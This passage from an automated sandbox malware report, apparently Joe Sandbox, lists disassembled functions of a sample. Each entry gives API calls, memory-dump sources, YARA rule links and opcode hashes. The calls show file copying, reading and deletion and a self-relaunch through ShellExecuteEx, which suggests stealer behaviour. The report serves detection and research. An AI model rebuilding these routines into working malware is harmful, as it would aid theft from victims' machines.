                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 00B3C9B5
                                                          • Part of subcall function 00B3C206: __getptd_noexit.LIBCMT ref: 00B3C209
                                                          • Part of subcall function 00B3C206: __amsg_exit.LIBCMT ref: 00B3C216
                                                        • __getptd.LIBCMT ref: 00B3C9CC
                                                        • __amsg_exit.LIBCMT ref: 00B3C9DA
                                                        • __lock.LIBCMT ref: 00B3C9EA
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00B3C9FE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                        • Instruction ID: 0b17c3f5730a5627eb416781a01212bc1913511647e6c7dfabb01a5e279a3f04
                                                        • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                        • Instruction Fuzzy Hash: C2F09032A407149BD722BBFC5807B1E3BE0AF00724F3203CAF514B61D2DB245940DB9A
                                                        Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000,00826A08), ref: 0041079A
                                                        • StrCmpCA.SHLWAPI(00000000,008268D8), ref: 00410866
                                                        • StrCmpCA.SHLWAPI(00000000,00826958), ref: 0041099D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: `_A
                                                        • API String ID: 3722407311-2339250863
                                                        • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                        • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                        • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                        • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                        Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000,00826A08), ref: 0041079A
                                                        • StrCmpCA.SHLWAPI(00000000,008268D8), ref: 00410866
                                                        • StrCmpCA.SHLWAPI(00000000,00826958), ref: 0041099D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: `_A
                                                        • API String ID: 3722407311-2339250863
                                                        • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                        • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                        • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                        • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                        Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                        • ExitProcess.KERNEL32 ref: 00416755
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: <
                                                        • API String ID: 1148417306-4251816714
                                                        • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                        • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                        • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                        • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                        Function 00B36897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B368CA
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00B3698D
                                                        • ExitProcess.KERNEL32 ref: 00B369BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: <
                                                        • API String ID: 1148417306-4251816714
                                                        • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                        • Instruction ID: 4e19ed3b2bb0f1544fc3e0d009e20f44e958d59090a3ea1ba0912b662e1c10bb
                                                        • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                        • Instruction Fuzzy Hash: 85316DB1901208ABDB14EB90DD86FDEB7B8AF04300FA051C9F24576191EF746B88CF5A
                                                        Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: @Jn@$Jn@$Jn@
                                                        • API String ID: 544645111-1180188686
                                                        • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                        • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                        • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                        • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                        Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                        • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcatlstrcpy
                                                        • String ID: vI@$vI@
                                                        • API String ID: 3905823039-1245421781
                                                        • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                        • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                        • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                        • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                        Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                        • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                        • wsprintfW.USER32 ref: 00418D78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocProcesswsprintf
                                                        • String ID: %hs
                                                        • API String ID: 659108358-2783943728
                                                        • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                        • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                        • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                        • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                        Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                        • String ID:
                                                        • API String ID: 257331557-0
                                                        • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                        • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                        • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                        • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                        Function 00B2A4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2A548
                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00B2A666
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2A923
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2A9AA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                        • String ID:
                                                        • API String ID: 257331557-0
                                                        • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                        • Instruction ID: e9c0e0f59c2b66e2e98ec9a1e1e25c46040771c83e4609b965bda93dbaf1cf49
                                                        • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                        • Instruction Fuzzy Hash: 07E10272910118ABCB04FBA4DD92DEEB379AF15701F709199F196720A1EF346B48CF62
                                                        Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                        • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                        • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                        • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                        Function 00B2D667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2D6E8
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2D8FF
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2D913
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2D992
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                        • Instruction ID: 9341116358c494c1cec591d54fa7fc7061f5c5701f869e48af5c7e10df73b813
                                                        • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                        • Instruction Fuzzy Hash: CA911472910114ABCB08FBA4DD96DEEB3B9AF15701F7051A9F146720A1EF346B48CF62
                                                        Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                        • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                        • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                        • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                        Function 00B2D9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2DA68
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2DC06
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2DC1A
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2DC99
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
